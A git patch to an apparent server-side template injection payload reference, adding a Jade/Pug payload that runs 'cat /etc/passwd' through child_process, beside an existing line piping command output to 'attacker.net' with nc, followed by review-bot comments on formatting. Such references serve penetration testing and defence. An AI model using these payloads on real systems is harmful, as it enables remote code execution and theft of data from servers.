From ed944a95af01500df47507fadc91d249e31838b1 Mon Sep 17 00:00:00 2001 From: akoul02 <36170608+akoul02@users.noreply.github.com> Date: Sat, 31 Oct 2020 18:02:29 +0300 Subject: [PATCH] Improved Jade payload --- Server Side Template Injection/README.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 4e3be42..e8ad1da 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -291,6 +291,10 @@ New version of Pebble : = x.exec('id | nc attacker.net 80') ``` +```javascript +#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout} +``` + ## Velocity ```python @@ -554,4 +558,4 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 * [Bean Stalking: Growing Java beans into RCE - July 7, 2020 - Github Security Lab](https://securitylab.github.com/research/bean-validation-RCE) * [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - 29/01/2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf) * [Handlebars template injection and RCE in a Shopify app ](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html) -* [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit) \ No newline at end of file +* [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit)
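Review bot: The new block in the first hunk is fenced as `javascript`, but its content is Jade/Pug interpolation syntax (`#{...}`), not plain JavaScript, and it lands directly under the existing `= x.exec('id | nc attacker.net 80')` block with no sentence saying how the two differ. Tag the fence to match the engine (or keep it consistent with the fence used by the block above it) and add a one-line caption explaining what "improved" means here, i.e. what the `root.process.mainModule.require(...)` route assumes about the rendering context that the `x.exec` form does not; without that, a reader assessing their own exposure cannot tell when each applies.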
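Review bot: The second hunk only restores the missing newline at the end of the PortSwigger lab reference line (`\ No newline at end of file` is the only change), which is unrelated to the "Improved Jade payload" subject. Either mention the whitespace fix in the commit message or split it into its own commit so `git blame` on the references list does not point at a payload change.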